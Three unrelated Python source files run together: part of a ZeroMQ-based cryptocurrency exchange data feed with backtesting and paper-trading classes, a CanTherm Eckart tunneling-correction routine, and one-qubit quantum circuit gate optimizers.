        :param addr: str: Client socket address
        :param timeout: int: reply timeout, in seconds
        """
        super(DataFeed, self).__init__()
        # Sock objects
        self.context = zmq.Context()
        self.addr = addr
        self.exchange = exchange
        self.timeout = timeout * 1000  # zmq.Poller works in milliseconds
        self.sock = self.context.socket(zmq.REQ)
        self.sock.connect(addr)
        self.poll = zmq.Poller()
        self.poll.register(self.sock, zmq.POLLIN)

    def __del__(self):
        # Best-effort cleanup of the REQ socket when the feed is collected.
        self.sock.close()

    # Retry decorator
    def retry(func):
        """ Retry decorator

        Re-invokes ``func`` after each DataFeedException, sleeping through
        the DataFeed.retryDelays schedule; once the schedule is exhausted a
        MaxRetriesException is raised.  (Plain function used as a decorator
        inside the class body, hence no ``self``.)
        """
        @_wraps(func)
        def retrying(*args, **kwargs):
            problems = []
            # One attempt per delay, plus a final attempt with delay=None.
            for delay in _chain(DataFeed.retryDelays, [None]):
                try:
                    # attempt call
                    return func(*args, **kwargs)
                # we need to try again
                except DataFeedException as problem:
                    problems.append(problem)
                    if delay is None:
                        # Out of retries: surface the accumulated failures.
                        Logger.debug(DataFeed, problems)
                        raise MaxRetriesException('retryDelays exhausted ' + str(problem))
                    else:
                        # log exception and wait
                        Logger.debug(DataFeed, problem)
                        Logger.error(DataFeed, "No reply... -- delaying for %ds" % delay)
                        sleep(delay)
        return retrying

    def get_response(self, req):
        """Send "<exchange> <req>" to the daemon and return its JSON reply.

        On a send error or reply timeout the REQ socket is torn down and
        recreated (required by the zmq REQ/REP state machine) and a
        DataFeedException subclass is raised so @retry can try again.
        """
        req = self.exchange + ' ' + req
        # Send request
        try:
            self.sock.send_string(req)
        except zmq.ZMQError as e:
            if 'Operation cannot be accomplished in current state' == e.__str__():
                # If request timeout, restart socket
                Logger.error(DataFeed.get_response, "%s request timeout." % req)
                # Socket is confused. Close and remove it.
                self.sock.setsockopt(zmq.LINGER, 0)
                self.sock.close()
                self.poll.unregister(self.sock)
                # Create new connection
                self.sock = self.context.socket(zmq.REQ)
                self.sock.connect(self.addr)
                self.poll.register(self.sock, zmq.POLLIN)
            raise DataFeedException("Socket error. Restarting connection...")
        # Get response
        socks = dict(self.poll.poll(self.timeout))
        if socks.get(self.sock) == zmq.POLLIN:
            # If response, return
            return self.sock.recv_json()
        else:
            # If request timeout, restart socket
            Logger.error(DataFeed.get_response, "%s request timeout." % req)
            # Socket is confused. Close and remove it.
            self.sock.setsockopt(zmq.LINGER, 0)
            self.sock.close()
            self.poll.unregister(self.sock)
            # Create new connection
            self.sock = self.context.socket(zmq.REQ)
            self.sock.connect(self.addr)
            self.poll.register(self.sock, zmq.POLLIN)
            raise RequestTimeoutException("%s request timedout" % req)

    @retry
    def returnTicker(self):
        """Return the current ticker as a dict."""
        try:
            rep = self.get_response('returnTicker')
            assert isinstance(rep, dict)
            return rep
        except AssertionError:
            raise UnexpectedResponseException("Unexpected response from DataFeed.returnTicker")

    @retry
    def returnBalances(self):
        """
        Return balance from exchange. API KEYS NEEDED!
        :return: dict
        """
        try:
            rep = self.get_response('returnBalances')
            assert isinstance(rep, dict)
            return rep
        except AssertionError:
            raise UnexpectedResponseException("Unexpected response from DataFeed.returnBalances")

    @retry
    def returnFeeInfo(self):
        """
        Returns exchange fee information
        :return: dict
        """
        try:
            rep = self.get_response('returnFeeInfo')
            assert isinstance(rep, dict)
            return rep
        except AssertionError:
            raise UnexpectedResponseException("Unexpected response from DataFeed.returnFeeInfo")

    @retry
    def returnCurrencies(self):
        """
        Return exchange currency pairs
        :return: dict
        """
        try:
            rep = self.get_response('returnCurrencies')
            assert isinstance(rep, dict)
            return rep
        except AssertionError:
            raise UnexpectedResponseException("Unexpected response from DataFeed.returnCurrencies")

    @retry
    def returnChartData(self, currencyPair, period, start=None, end=None):
        """
        Return pair OHLC data
        :param currencyPair: str: Desired pair str
        :param period: int: Candle period. Must be in [300, 900, 1800, 7200, 14400, 86400]
        :param start: str: UNIX timestamp to start from
        :param end: str: UNIX timestamp to end returned data
        :return: list: List containing desired asset data in "records" format
        """
        try:
            call = "returnChartData %s %s %s %s" % (str(currencyPair),
                                                    str(period),
                                                    str(start),
                                                    str(end))
            rep = self.get_response(call)
            # Unknown pair: retry with the reversed symbol order and convert
            # the returned candles to the reciprocal quote.
            if 'Invalid currency pair.' in rep:
                try:
                    symbols = currencyPair.split('_')
                    pair = symbols[1] + '_' + symbols[0]
                    call = "returnChartData %s %s %s %s" % (str(pair),
                                                            str(period),
                                                            str(start),
                                                            str(end))
                    rep = json.loads(
                        self.pair_reciprocal(pd.DataFrame.from_records(self.get_response(call))).to_json(
                            orient='records'))
                except Exception as e:
                    raise e
            # Sanity-check the reply shape before handing it to callers.
            assert isinstance(rep, list), "returnChartData reply is not list"
            assert int(rep[-1]['date']), "Bad returnChartData reply data"
            assert float(rep[-1]['open']), "Bad returnChartData reply data"
            assert float(rep[-1]['close']), "Bad returnChartData reply data"
            return rep
        except AssertionError:
            raise UnexpectedResponseException("Unexpected response from DataFeed.returnChartData")

    @retry
    def returnTradeHistory(self, currencyPair='all', start=None, end=None):
        """Return the account trade history for ``currencyPair`` as a dict."""
        try:
            call = "returnTradeHistory %s %s %s" % (str(currencyPair),
                                                    str(start),
                                                    str(end))
            rep = self.get_response(call)
            assert isinstance(rep, dict)
            return rep
        except AssertionError:
            raise UnexpectedResponseException("Unexpected response from DataFeed.returnTradeHistory")

    @retry
    def returnDepositsWithdrawals(self, start=False, end=False):
        """Return deposit/withdrawal history between ``start`` and ``end``."""
        try:
            call = "returnDepositsWithdrawals %s %s" % (
                str(start),
                str(end)
            )
            rep = self.get_response(call)
            assert isinstance(rep, dict)
            return rep
        except AssertionError:
            raise UnexpectedResponseException("Unexpected response from DataFeed.returnDepositsWithdrawals")

    @retry
    def sell(self, currencyPair, rate, amount, orderType=False):
        """Place a sell order through the daemon; returns its reply."""
        try:
            call = "sell %s %s %s %s" % (str(currencyPair),
                                         str(rate),
                                         str(amount),
                                         str(orderType))
            rep = self.get_response(call)
            # Unknown pair: retry with the reversed symbol order.
            # NOTE(review): rate/amount are sent unchanged for the reversed
            # pair -- confirm the daemon/exchange handles the conversion.
            if 'Invalid currency pair.' in rep:
                try:
                    symbols = currencyPair.split('_')
                    pair = symbols[1] + '_' + symbols[0]
                    call = "sell %s %s %s %s" % (str(pair),
                                                 str(rate),
                                                 str(amount),
                                                 str(orderType))
                    rep = self.get_response(call)
                except Exception as e:
                    raise e
            assert isinstance(rep, str) or isinstance(rep, dict)
            return rep
        except AssertionError:
            raise UnexpectedResponseException("Unexpected response from DataFeed.sell")

    @retry
    def buy(self, currencyPair, rate, amount, orderType=False):
        """Place a buy order through the daemon; returns its reply."""
        try:
            call = "buy %s %s %s %s" % (str(currencyPair),
                                        str(rate),
                                        str(amount),
                                        str(orderType))
            rep = self.get_response(call)
            # Unknown pair: retry with the reversed symbol order.
            # NOTE(review): rate/amount are sent unchanged -- see sell().
            if 'Invalid currency pair.' in rep:
                try:
                    symbols = currencyPair.split('_')
                    pair = symbols[1] + '_' + symbols[0]
                    call = "buy %s %s %s %s" % (str(pair),
                                                str(rate),
                                                str(amount),
                                                str(orderType))
                    rep = self.get_response(call)
                except Exception as e:
                    raise e
            assert isinstance(rep, str) or isinstance(rep, dict)
            return rep
        except AssertionError:
            raise UnexpectedResponseException("Unexpected response from DataFeed.buy")
# Test datafeeds
class BacktestDataFeed(ExchangeConnection):
    """
    Data feeder for backtesting with TradingEnvironment.

    Serves pre-downloaded (or disk-cached) OHLC candles instead of querying
    a live exchange; balances and fees are static fixtures.
    """
    # TODO WRITE TESTS
    def __init__(self, tapi, period, pairs=[], balance={}, load_dir=None):
        """
        :param tapi: exchange api instance used to download data
        :param period: int: candle period, in minutes
        :param pairs: list: pair symbols to serve
        :param balance: dict: simulated starting balance
        :param load_dir: str: directory holding cached json data, if any
        """
        # NOTE(review): mutable defaults (pairs=[], balance={}) are shared
        # across instances if not passed explicitly.
        super().__init__()
        self.tapi = tapi
        self.ohlc_data = {}   # pair -> OHLC DataFrame, indexed by 'date'
        self._balance = balance
        self.data_length = 0  # row count of the shortest pair series
        self.load_dir = load_dir
        # Static fee fixture (Poloniex-style keys).
        self.tax = {'makerFee': '0.00150000',
                    'nextTier': '600.00000000',
                    'takerFee': '0.00250000',
                    'thirtyDayVolume': '0.00000000'}
        self.pairs = pairs
        self.period = period

    def returnBalances(self):
        """Return the simulated balance dict."""
        return self._balance

    def set_tax(self, tax):
        """
        Merge new values into the fee fixture, e.g.:
        {'makerFee': '0.00150000',
         'nextTier': '600.00000000',
         'takerFee': '0.00250000',
         'thirtyDayVolume': '0.00000000'}
        :param tax: dict: keys to merge into the current fees
        :return:
        """
        self.tax.update(tax)

    def returnFeeInfo(self):
        """Return the (possibly overridden) fee fixture."""
        return self.tax

    def returnCurrencies(self):
        """Return currency metadata from the disk cache if present, else the api."""
        if self.load_dir:
            try:
                with open(self.load_dir + '/currencies.json') as file:
                    return json.load(file)
            except Exception as e:
                # Cache missing or unreadable: log and fall back to the api.
                Logger.error(BacktestDataFeed.returnCurrencies, str(e.__cause__) + str(e))
                return self.tapi.returnCurrencies()
        else:
            return self.tapi.returnCurrencies()

    def download_data(self, start=None, end=None):
        """Download and align OHLC history for every pair in ``self.pairs``."""
        # TODO WRITE TEST
        self.ohlc_data = {}
        self.data_length = None
        # Target index: one row per candle period between start and end.
        index = pd.date_range(start=start,
                              end=end,
                              freq="%dT" % self.period).ceil("%dT" % self.period)
        for pair in self.pairs:
            ohlc_df = pd.DataFrame.from_records(
                self.tapi.returnChartData(
                    pair,
                    period=self.period * 60,  # api expects seconds
                    start=start,
                    end=end
                ),
                nrows=index.shape[0]
            )
            # Walk back from the end to the most recent finite close price.
            i = -1
            last_close = ohlc_df.at[ohlc_df.index[i], 'close']
            while not dec_con.create_decimal(last_close).is_finite():
                i -= 1
                last_close = ohlc_df.at[ohlc_df.index[i], 'close']
            # Replace missing values with last close
            fill_dict = {col: last_close for col in ['open', 'high', 'low', 'close']}
            fill_dict.update({'volume': '0E-16'})
            self.ohlc_data[pair] = ohlc_df.fillna(fill_dict).ffill()
        # Find the shortest series so all pairs can be truncated to align.
        for key in self.ohlc_data:
            if not self.data_length or self.ohlc_data[key].shape[0] < self.data_length:
                self.data_length = self.ohlc_data[key].shape[0]
        for key in self.ohlc_data:
            if self.ohlc_data[key].shape[0] != self.data_length:
                # self.ohlc_data[key] = pd.DataFrame.from_records(
                #     self.tapi.returnChartData(key, period=self.period * 60,
                #                               start=self.ohlc_data[key].date.iloc[-self.data_length],
                #                               end=end
                #                               ),
                #     nrows=index.shape[0]
                # )
                self.ohlc_data[key] = self.ohlc_data[key].iloc[:self.data_length]
            self.ohlc_data[key].set_index('date', inplace=True, drop=False)
        print("%d intervals, or %d days of data at %d minutes period downloaded." % (self.data_length, (self.data_length * self.period) /\
                                                                                     (24 * 60), self.period))

    def save_data(self, dir=None):
        """
        Save data to disk
        :param dir: str: directory relative to ./; eg './data/train
        :return:
        """
        for item in self.ohlc_data:
            self.ohlc_data[item].to_json(dir+'/'+str(item)+'_'+str(self.period)+'min.json', orient='records')

    def load_data(self, dir):
        """
        Load data from disk.
        JSON like data expected.
        :param dir: str: directory relative to self.load_dir; eg: './self.load_dir/dir'
        :return: None
        """
        self.ohlc_data = {}
        self.data_length = None
        for key in self.pairs:
            self.ohlc_data[key] = pd.read_json(self.load_dir + dir +'/'+str(key)+'_'+str(self.period)+'min.json', convert_dates=False,
                                               orient='records', date_unit='s', keep_default_dates=False, dtype=False)
            self.ohlc_data[key].set_index('date', inplace=True, drop=False)
            # Every pair must contribute the same number of rows.
            if not self.data_length:
                self.data_length = self.ohlc_data[key].shape[0]
            else:
                assert self.data_length == self.ohlc_data[key].shape[0]

    def returnChartData(self, currencyPair, period, start=None, end=None):
        """Return cached candles for ``currencyPair`` between start and end ("records" format)."""
        try:
            data = json.loads(self.ohlc_data[currencyPair].loc[start:end, :].to_json(orient='records'))
            return data
        except json.JSONDecodeError:
            print("Bad exchange response.")
        except AssertionError as e:
            # NOTE(review): comparing a string against the exception object
            # is always False, so neither branch below can ever fire -- the
            # comparison presumably should be against str(e).  Confirm
            # before relying on these errors.
            if "Invalid period" == e:
                raise ExchangeError("%d invalid candle period" % period)
            elif "Invalid pair" == e:
                raise ExchangeError("Invalid currency pair.")

    def reverse_data(self):
        """Reverse the time ordering of every cached series, in place."""
        for df in self.ohlc_data:
            self.ohlc_data.update({df:self.ohlc_data[df].reindex(index=self.ohlc_data[df].index[::-1])})
            self.ohlc_data[df]['date'] = self.ohlc_data[df].index[::-1]
            self.ohlc_data[df].index = self.ohlc_data[df].index[::-1]
            # Reversing time swaps the roles of the open and close prices.
            self.ohlc_data[df] = self.ohlc_data[df].rename(columns={'close': 'open', 'open': 'close'})
class PaperTradingDataFeed(ExchangeConnection):
    """
    Data feeder for paper trading with TradingEnvironment.

    Delegates all market data to a live exchange api while keeping a
    simulated balance, so strategies trade on real prices without real funds.
    """
    # TODO WRITE TESTS
    def __init__(self, tapi, period, pairs=[], balance={}):
        """
        :param tapi: exchange api instance: live data source
        :param period: int: candle period, in minutes
        :param pairs: list: pair symbols to trade
        :param balance: dict: simulated starting balance
        """
        # NOTE(review): mutable defaults (pairs=[], balance={}) are shared
        # across instances if not passed explicitly.
        super().__init__()
        self.tapi = tapi
        self._balance = balance
        self.pairs = pairs
        self.period = period

    def returnBalances(self):
        """Return the simulated balance dict."""
        return self._balance

    def returnFeeInfo(self):
        """Return a static Poloniex-style fee fixture."""
        return {'makerFee': '0.00150000',
                'nextTier': '600.00000000',
                'takerFee': '0.00250000',
                'thirtyDayVolume': '0.00000000'}

    def returnTicker(self):
        """Return the live ticker from the underlying api."""
        return self.tapi.returnTicker()

    def returnCurrencies(self):
        """
        Return exchange currency pairs
        :return: list:
        """
        return self.tapi.returnCurrencies()

    def returnChartData(self, currencyPair, period, start=None, end=None):
        """
        Return pair OHLC data
        :param currencyPair: str: Desired pair str
        :param period: int: Candle period. Must be in [300, 900, 1800, 7200, 14400, 86400]
        :param start: str: UNIX timestamp to start from
        :param end: str: UNIX timestamp to end returned data
        :return: list: List containing desired asset data in "records" format
        """
        try:
            return self.tapi.returnChartData(currencyPair, period, start=start, end=end)
        except ExchangeError as error:
            # Unknown pair: retry with the reversed symbol order and return
            # the reciprocal-quoted candles.
            if 'Invalid currency pair.' == error.__str__():
                try:
                    symbols = currencyPair.split('_')
                    pair = symbols[1] + '_' + symbols[0]
                    return json.loads(
                        self.pair_reciprocal(pd.DataFrame.from_records(self.tapi.returnChartData(pair, period,
                                                                                                 start=start,
                                                                                                 end=end
                                                                                                 ))).to_json(
                            orient='records'))
                except Exception as e:
                    raise e
            else:
                raise error
# Live datafeeds
class PoloniexConnection(DataFeed):
    """Live Poloniex data feed: a DataFeed client plus trading pair/period state."""
    def __init__(self, period, pairs=[], exchange='', addr='ipc:///tmp/feed.ipc', timeout=20):
        """
        :param period: int: Data period
        :param pairs: list: Pairs to trade
        :param exchange: str: FeedDaemon exchange to query
        :param addr: str: client socket address
        :param timeout: int: request timeout, in seconds
        """
        super().__init__(exchange, addr, timeout)
        self.pairs = pairs
        self.period = period

    @DataFeed.retry
    def returnChartData(self, currencyPair, period, start=None, end=None):
        """
        Return pair OHLC data
        :param currencyPair: str: Desired pair str
        :param period: int: Candle period. Must be in [300, 900, 1800, 7200, 14400, 86400]
        :param start: str: UNIX timestamp to start from
        :param end: str: UNIX timestamp to end returned data
        :return: list: List containing desired asset data in "records" format
        """
        try:
            call = "returnChartData %s %s %s %s" % (str(currencyPair),
                                                    str(period),
                                                    str(start),
                                                    str(end))
            rep = self.get_response(call)
            # Unknown pair: retry with the reversed symbol order and convert
            # the returned candles to the reciprocal quote.
            if 'Invalid currency pair.' in rep:
                try:
                    symbols = currencyPair.split('_')
                    pair = symbols[1] + '_' + symbols[0]
                    call = "returnChartData %s %s %s %s" % (str(pair),
                                                            str(period),
                                                            str(start),
                                                            str(end))
                    rep = json.loads(
                        self.pair_reciprocal(
                            pd.DataFrame.from_records(
                                self.get_response(call)
                            )
                        ).to_json(orient='records'))
                except Exception as e:
                    raise e
            # Sanity-check the reply shape before handing it to callers.
            assert isinstance(rep, list), "returnChartData reply is not list: %s" % str(rep)
            assert int(rep[-1]['date']), "Bad returnChartData reply data"
            assert float(rep[-1]['open']), "Bad returnChartData reply data"
            assert float(rep[-1]['close']), "Bad returnChartData reply data"
            return rep
        except AssertionError:
            raise UnexpectedResponseException("Unexpected response from DataFeed.returnChartData")
|
<reponame>shamelmerchant/CanTherm
#!/usr/bin/env python
"""
Copyright (c) 2002-2009 <NAME> and the CanTherm Team
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
#Computes the Eckart tunneling correction
# Inputs are:
# delV1 - energy difference between TS and reactants [=] Joules
# T - absolute temperature [=] Kelvin
# alpha1 - dimensionless energy difference between TS and reactants
# alpha2 - dimensionless energy difference between TS and reactants (if symmetric)
# or between TS and products (if asymmetric)
# Output is kappa(T), the dimensionless tunneling correction factor
import os
from numpy import *
from scipy import *
import CanTherm
def computeTunnelingCorrection(delV1,T,alpha1,alpha2):
    """Compute the Eckart tunneling correction factor kappa(T).

    delV1  - energy difference between TS and reactants [J]
    T      - absolute temperature [K]
    alpha1 - dimensionless barrier parameter, reactant side
    alpha2 - dimensionless barrier parameter (TS-reactants if symmetric,
             TS-products if asymmetric)
    Returns kappa(T), the dimensionless tunneling correction.

    NOTE: Python 2 code (see the bare 'print kappa_T' statement below).
    """
    #print delV1, ' ', alpha1, ' ', alpha2, ' ', T
    k = 1.381e-23  # Boltzmann constant [J/K]
    # The following lines of code were written by MRH for debugging purposes
    # The file table1.out contains a table of kappa(T) for a range of dimensionless
    # variables alpha1, alpha2, and ustar and was compared against Table1 of:
    # "Tunneling corrections for unsymmetrical eckart potential energy barriers",
    # Johnston and Heicklen, J. Phys. Chem., v. 66, (1962), p.532-533
    # MRH believes he found an error in the data reported in the paper:
    # alpha1=0.5; alpha2=0.5,1,2,4; ustar=all
    # alpha1=1; alpha2=1,2; ustar=all
    # Problem is that division in calculating kappa_E should be done element-by-element
    # MRH believes this was not done in Johnston paper, rather a least-squares fitting
    # was performed to solve for "a" where "aX=Y" by calling "Y/X"
    #
    # oFile = open('table1.out','w')
    # alpha1vec = [0.5, 1, 2, 4, 8, 12, 16, 20]
    # alpha2vec = [0.5, 1, 2, 4, 8, 12, 16, 20]
    # ustarvec = [2, 3, 4, 5, 6, 8, 10, 12, 16]
    # for i in range(len(alpha1vec)):
    #     alpha1 = alpha1vec[i]
    #     for j in range(i,len(alpha2vec)):
    #         alpha2 = alpha2vec[j]
    #         for m in range(len(ustarvec)):
    #             T = 2*math.pi*delV1/alpha1/k/ustarvec[m]
    #             integral = integrate.quad(f_of_E,0,50,args=(delV1,k*T,alpha1,alpha2))[0]
    #             kappa_T = integral*math.exp(delV1/k/T)
    #             oFile.write(str(kappa_T) + '\t')
    #         oFile.write('\n')
    #     oFile.write('\n')
    # oFile.close()
    # MRH changed limits of integration from 0 --> infinity to 0 --> 50
    # Problem: Some calculations were underestimating the integral, most likely due to large
    # step sizes when the important portion of the curve is close to zero.
    # MRH computed the value of E_kT* such that f_of_E(E_kT*) < 0.001*max(f_of_E)
    # for all alpha1, alpha2, ustar combinations present in Johnston paper. This value was
    # ~35, so MRH decided on 50 as the upper bound of the integral
    #integral = integrate.quad(f_of_E,0,100,args=(delV1,k*T,alpha1,alpha2))[0]
    #kappa_T = integral * math.exp(delV1/k/T)
    # Tabulate the integrand on a 10000-point grid over E/kT in [0, 1000]
    # to locate the energy window that actually contributes.
    x = array(zeros((10000,1),dtype=float))
    f_x = array(zeros((10000,1),dtype=float))
    for i in range(10000):
        x[i] = 1000.0*i/9999
        f_x[i] = f_of_E(x[i],delV1,k*T,alpha1,alpha2)
    # NOTE(review): 'max' shadows the builtin max() for the remainder of
    # this function (local scope only).
    max = f_x.max(0)
    lowerlimit = max/1000.0
    # Restrict the quadrature to where the integrand exceeds 0.1% of its peak.
    vector_of_Es = (f_x>lowerlimit).nonzero()
    maxE = x[vector_of_Es[0][-1]]
    minE = x[vector_of_Es[0][0]]
    #print str(minE) + ' ' + str(maxE)
    integral = integrate.quad(f_of_E,minE,maxE,args=(delV1,k*T,alpha1,alpha2))[0]
    # Weight by the Boltzmann factor of the barrier height.
    kappa_T = integral * math.exp(delV1/k/T)
    print kappa_T
    return kappa_T
def f_of_E(E_kt,delV1,kT,alpha1,alpha2):
    """Integrand of the Eckart tunneling integral.

    E_kt   - energy in units of kT (dimensionless)
    delV1  - forward barrier height [J]
    kT     - Boltzmann constant times temperature [J]
    alpha1, alpha2 - dimensionless Eckart barrier parameters
    Returns exp(-E/kT) * kappa(E): the Boltzmann-weighted transmission
    probability through the Eckart barrier at energy E.

    NOTE(review): bare exp() comes from the module's star imports
    (numpy/scipy) while math.exp/math.cosh are also used -- mixed on
    purpose or by accident; confirm before refactoring.
    """
    # 2*pi*d term of the Eckart transmission coefficient; a negative
    # radicand means d is imaginary, handled here by taking sqrt(|radicand|).
    radicand = alpha1*alpha2-4*math.pi*math.pi/16
    if radicand < 0 :
        twopid = 2*math.sqrt(-1*radicand)
    else :
        twopid = 2*math.sqrt(radicand)
    # Energy normalized by the forward barrier height.
    nondimE = E_kt*kT/delV1
    # 2*pi*a term.
    twopia = 2*math.sqrt(alpha1*nondimE)/(1/math.sqrt(alpha1)+1/math.sqrt(alpha2))
    # 2*pi*b term; again guard against a negative radicand.
    radicand2 = (nondimE-1)*alpha1+alpha2
    if radicand2 < 0:
        twopib = 2*math.sqrt(-1*radicand2)
    else:
        twopib = 2*math.sqrt(radicand2)
    twopib = twopib/(1/math.sqrt(alpha1)+1/math.sqrt(alpha2))
    # python cannot handle computing the value of cosh(700)
    # To be safe, MRH checks if any of the cosh arguments are greater than 200
    # If all cosh() arguments less than 200, compute kappa_E as normal
    if (twopia < 200) & (twopib < 200) & (twopid < 200) :
        kappa_E = 1 - (math.cosh(twopia-twopib)+math.cosh(twopid)) / (math.cosh(twopia+twopib)+math.cosh(twopid))
    # If not, need to be smarter about which terms to evaluate
    else :
        # If at least one of the following expressions is large enough, we can eliminate most of the exponential terms
        # after writing out the definition of cosh() and dividing all terms by exp(twopid)
        if (twopia-twopib-twopid > 10) | (twopib-twopia-twopid > 10) | (twopia+twopib-twopid > 10) :
            kappa_E = 1 - exp(-2*twopia) - exp(-2*twopib) - exp(-twopia-twopib+twopid) - exp(-twopia-twopib-twopid)
        # Otherwise evaluate the kappa_E expression normally, except use the expanded
        # definition - expanding the cosh argument and dividing all terms by exp(twopid)
        else :
            numerator = math.exp(twopia-twopib-twopid)+exp(-twopia+twopib-twopid)+1+exp(-2*twopid)
            denominator = math.exp(twopia+twopib-twopid)+exp(-twopia-twopib-twopid)+1+exp(-2*twopid)
            kappa_E = 1 - numerator/denominator
    # Boltzmann weight at energy E (E_kt is already E/kT).
    integrand = math.exp(-E_kt)*kappa_E
    return integrand
|
<gh_stars>0
from optimize_circuit.transformations import u_to_zxz_gates, u_to_zyz_gates
from optimize_circuit.gates import OneQubitUnitary, X, Y, Z
import numpy as np
def optimize_one_qubit_circuit(gate_list, hardware):
    """Optimizes one qubit gate_list

    Multiplies all the gate matrices into one 2x2 unitary, strips its
    global phase, extracts Euler-style angles and re-synthesises the
    circuit as an optimal three-gate sequence for the given hardware.

    :param hardware: HardwareConfiguration
    :param gate_list: list of Gate objects (X, Y, Z)
    :return: optimized gate_list
    :raises ArithmeticError: if the phase-stripped unitary's [0, 0]
        entry is not (numerically) real
    """
    index = gate_list[0].qubit_index
    # Accumulate the whole circuit into a single 2x2 unitary.
    resulting_unitary = np.identity(2, dtype=complex)
    for gate in gate_list:
        resulting_unitary = np.matmul(resulting_unitary, gate.arr)
    # Remove the global phase so U[0, 0] becomes real and non-negative.
    global_phase = np.angle(resulting_unitary[0, 0])
    resulting_unitary = np.exp(-1j * global_phase) * resulting_unitary
    # BUG FIX: check the magnitude of the imaginary part -- the original
    # only rejected positive deviations and silently accepted negative ones.
    if abs(resulting_unitary[0, 0].imag) > 1e-5:
        raise ArithmeticError(
            "resulting_unitary[0, 0].imag must be 0 "
            f"at this point, but it is equal to "
            f"{resulting_unitary[0, 0].imag }"
        )
    # Recover the rotation angles from the canonical U(theta, phi, lambda) form.
    theta_rad = np.arccos(np.abs(resulting_unitary[0, 0]))
    phi_rad = np.angle(resulting_unitary[1, 0])
    lam_rad = np.angle(-resulting_unitary[0, 1])
    u_one_qubit_gate = OneQubitUnitary(
        index, np.rad2deg(theta_rad), np.rad2deg(phi_rad), np.rad2deg(lam_rad))
    return u_to_optimal_three_gates(u_one_qubit_gate, hardware)
def u_to_optimal_three_gates(u_one_gate, hardware):
    """ Finds the optimal gate sequence

    Decomposes the unitary into both Z-X-Z and Z-Y-Z candidates, then
    keeps whichever the hardware supports -- or, when both are allowed,
    whichever executes faster.

    :param u_one_gate: OneQubitUnitary
    :param hardware: HardwareConfiguration
    :return: list of optimal gates
    """
    zxz_candidate = u_to_zxz_gates(u_one_gate)
    zyz_candidate = u_to_zyz_gates(u_one_gate)
    # Hardware without X (resp. Y) support forces the other decomposition.
    if "X" not in hardware.basis_gates:
        return zyz_candidate
    if "Y" not in hardware.basis_gates:
        return zxz_candidate
    # Both are available: pick the faster sequence (ties go to Z-Y-Z).
    zxz_duration = hardware.duration_of_one_qubit_gates(zxz_candidate)
    zyz_duration = hardware.duration_of_one_qubit_gates(zyz_candidate)
    return zxz_candidate if zxz_duration < zyz_duration else zyz_candidate
def micro_optimize_one_qubit_circuit(gate_list):
    """Does mini optimization on circuits of up to three gates.

    A single full rotation (multiple of 360 degrees) cancels; two- and
    three-gate circuits are delegated to the dedicated optimizers.

    :param gate_list: list of gates
    :return: optimized gate_list
    """
    if len(gate_list) == 1:
        # A rotation by a multiple of 360 degrees is the identity.
        if int(gate_list[0].theta) % 360 == 0:
            return []
        else:
            return gate_list
    if len(gate_list) == 2:
        return optimize_two_gate(gate_list)
    if len(gate_list) == 3:
        return optimize_three_gate(gate_list)
    # BUG FIX: the original fell off the end and returned None for an empty
    # list or for circuits longer than three gates; return them unchanged.
    return gate_list
def optimize_three_gate(gate_list):
    """Optimizes three gate circuit

    First tries to merge an adjacent pair (front or back); when a pair
    collapses, the shortened circuit is re-optimized as a two-gate
    circuit.  Otherwise falls back to the three-gate identities.

    :param gate_list: list of gates
    :return: optimized gate_list
    """
    head_pair = optimize_two_gate(gate_list[0:2])
    tail_pair = optimize_two_gate(gate_list[1:])
    # The leading pair merged (or cancelled): re-optimize what remains.
    if len(head_pair) <= 1:
        return optimize_two_gate(head_pair + gate_list[2:])
    # The trailing pair merged (or cancelled): re-optimize what remains.
    if len(tail_pair) <= 1:
        return optimize_two_gate(gate_list[0:1] + tail_pair)
    # No adjacent merge possible -- try the three-gate identities.
    return optimize_with_three_gate_identities(gate_list)
def optimize_two_gate(gate_list):
    """Optimizes two gate circuit

    Two consecutive rotations about the same axis merge into a single
    rotation; when the merged angle is a multiple of 360 degrees the
    pair cancels entirely.

    :param gate_list: list of Gates
    :return: optimized gate_list
    """
    first, second = gate_list[0], gate_list[1]
    for axis in (X, Y, Z):
        if isinstance(first, axis) and isinstance(second, axis):
            theta = first.theta + second.theta
            if int(theta) % 360 == 0:
                return []
            # BUG FIX: the merged gate was created on hard-coded qubit 0;
            # keep the qubit index of the gates being merged.
            return [axis(first.qubit_index, theta)]
    # Different axes: nothing to merge.
    return gate_list
def optimize_with_three_gate_identities(gate_list):
    """Optimize with three gates identities

    :param gate_list: list of gates
    :return: optimized gate_list
    """
    # XYX = -Y, XZX = -Z when X.theta ==180
    if isinstance(gate_list[0], X) and isinstance(gate_list[2], X) and \
            int(gate_list[0].theta) == 180 and int(gate_list[2].theta) == 180:
        if isinstance(gate_list[1], Y):
            return [Y(gate_list[1].qubit_index, -gate_list[1].theta)]
        if isinstance(gate_list[1], Z):
            return [Z(gate_list[1].qubit_index, -gate_list[1].theta)]
    # YXY = -X, YZY = -Z when Y.theta ==180
    if isinstance(gate_list[0], Y) and isinstance(gate_list[2], Y) and \
            int(gate_list[0].theta) == 180 and int(gate_list[2].theta) == 180:
        if isinstance(gate_list[1], X):
            return [X(gate_list[1].qubit_index, -gate_list[1].theta)]
        if isinstance(gate_list[1], Z):
            return [Z(gate_list[1].qubit_index, -gate_list[1].theta)]
    # ZXZ = -X, ZYZ = -Y when Z.theta ==180
    if isinstance(gate_list[0], Z) and isinstance(gate_list[2], Z) and \
            int(gate_list[0].theta) == 180 and int(gate_list[2].theta) == 180:
        if isinstance(gate_list[1], X):
            return [X(gate_list[1].qubit_index, -gate_list[1].theta)]
        if isinstance(gate_list[1], Y):
            return [Y(gate_list[1].qubit_index, -gate_list[1].theta)]
